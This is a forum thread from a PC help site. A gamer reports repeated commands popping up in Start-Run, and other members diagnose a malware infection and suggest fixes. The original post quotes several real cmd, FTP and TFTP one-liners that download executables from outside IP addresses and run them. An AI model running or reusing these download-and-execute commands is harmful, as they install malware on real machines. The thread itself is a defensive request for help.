Some-one actively hacking me

Viruses, hackers and crackers
Post Reply
Booswig
Registered User
Posts: 63
Joined: 11 Nov 2004, 02:00
Contact:

Some-one actively hacking me

Post by Booswig »

Some-one is physically hacking me the last few months. I went and bought Symantec Internet Security, but removed it as it didn't stop it, and it made my PC almost impossible to work with.

I use an ADSL Router as a PPPOE modem, dailing out to allow my PC to get an IP. I unfortunately needs an IP to allow me to create games in Warcraft 3 (I am a DOTA addict).

While I can use my router to dail out, use the internal firewall, open the required ports and forwarding the ports to one PC, it will limit me to only using one PC for games. I however tried it, and the idiot still gets through.

I scanned my PC with NOD32, AVG, Norton and Mcafee, could not find any virusses, spyware or other threads. I currently use ZoneAlarm and AVG on my PC.

Somehow the person manages to activate my 'START - RUN', he types in either command and then try to open a ftp port to a certain address to download a program, or similar. Fortunately I just disabled FTP on my PC, so Zone Alarm just closes it automatically.

Yes, it happens 20 - 30 times a day, and it kills my gaming, as my PC switches to the desktop while it is happening. The result is that I frequently die as the game is still continuing in the background. Quite frustrating.

Typical commands includes:

Code: Select all

cmd /c echo OPEN 41.242.239.23 30534>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit

cmd /c echo OPEN 41.242.94.73 33136>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit

cmd /c echo OPEN 41.242.29.170 5969>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit

cmd /c echo OPEN 41.242.114.134 10285>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit

%comspec% /c tftp -i 83.226.184.184 GET unaea.exe & start unaea

cmd /c echo OPEN 41.242.53.17 21103>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
Anyone have:
- What the guy wants to do,
- What is the 84785_2pac.exe program (googled it, no info),
- An idea how I can stop it,
- An idea how I can trace the guy causing it (I have a baseball bat that I would like to introduce to him)
Last edited by Booswig on 13 Mar 2007, 22:59, edited 3 times in total.
I\'m a right-wing, democratic, conservative Christian who thinks the spotted owl tastes like chicken.
KillerByte
G3AR Staff Member
Posts: 5790
Joined: 08 Mar 2003, 02:00
Location: PCFormat HQ
Contact:

Post by KillerByte »

i think that you need to contact your ISP first. they should have some security in place to prevent this.
What I type has nothing to do with the people that employ me.
Anthro
Moderator Emeritus
Posts: 5547
Joined: 21 Dec 2002, 02:00
Processor: i7 3770k
Motherboard: ASUS P8P67-Pro
Graphics card: 2xNvidia GTX670
Memory: 16 GB Gskill Sniper
Location: In SQL Space inserting 'null' on purpose
Contact:

Post by Anthro »

Obviously he wants to copy files "84785_2pac.exe", "unaea.exe" onto your pc so that it can do it's dirty deeds.
If he is doing it daily, I am going to ask the question where is he getting your IP address from, as you are clearly in the 41.242.*.* range... this might be your downfall.. check if there arent any settings inside your router pertaining to something similar to dydns settings / Long shot says he has set up something like that on your router after hacking you.
Ek neem aan jy is Afrikaans, gaan kyk by hierdie link

Hierdie Nederlandse oke word ook daarmee gepla

PM vir my jou huidige IP.. ek wil gou iets sien.
Temporary Absence
Hex_Rated
Registered User
Posts: 3679
Joined: 19 Jan 2006, 02:00
Contact:

Post by Hex_Rated »

Use the router as a full router, not just a modem so you are behind a NAT firewall. Setup port forwarding to open the ports you need for DOTA. Use something like the dyndns client to get your external IP. Try get his IP address from ZoneAlarm and block him completely. He is probably spoofing it though. I would start with all the IP addresses above in your code section provided they aren't your own external address.
DFI LanParty X48 LT-2TR
Intel Q9450 @ 3.2Ghz
Dell 24" 2408WFP | Phillips 37" 1080p
Sapphire HD4870 X2 2GB
4GB Corsair DDR-2 1066 | Thermalrite 120 Ultra Extreme | G9 Mouse | G15 Keyboard
Vista Ultimate x64
User avatar
rustypup
Registered User
Posts: 8872
Joined: 13 Dec 2004, 02:00
Location: nullus pixius demonica
Contact:

Re: Some-one actively hacking me

Post by rustypup »

Booswig wrote:it happens 20 - 30 times a day
you're not being 'actively hacked'. you've been infected...

not even the most dilligent of 'hacker's would be patient enough to keep trying multiple times a day. unfortunately, the mainstream scanners will detect known infections... this means that they're reactive, ie. one step behind...

the fact that you can actually see the attempt points to some kiddie-script lameness, (almost certainly spyware)... typically, a dedicated author would prefer you *not* to notice the infection..

what spyware scanner are you using? (check out thrall's Practising Safe Hex thread for a few suggestions... ) - AVG's spyware scanner does a great job...

also, grab a copy of HijackThis and post the scan dump..
Most people would sooner die than think; in fact, they do so - Bertrand Russel
Sojourn
Registered User
Posts: 5649
Joined: 02 Sep 2004, 02:00
Location: Still looking...

Post by Sojourn »

What rusty said.

s
SBSP
Registered User
Posts: 3124
Joined: 09 May 2006, 02:00
Location: Centurion

Post by SBSP »

What Sojourn said :lol:

probably an application sending keystrokes and clicks.
sounds like a armature vb application.
Hman
Registered User
Posts: 28520
Joined: 06 Oct 2003, 02:00
Processor: Intel i5 650
Motherboard: Asus P7H55-M LX
Graphics card: Gigabyte 7850 2GB OC
Memory: 8GB Kingston DDR3
Location: In my skin
Contact:

Post by Hman »

Sounds like someone has been visiting shady porn sites.
"Every thinking man is a drinking man."


Member of the Barberton Tigers
lancelot
Registered User
Posts: 7162
Joined: 13 May 2003, 02:00
Location: Cape Town

Post by lancelot »

:D :D :lol: :lol:
Post Reply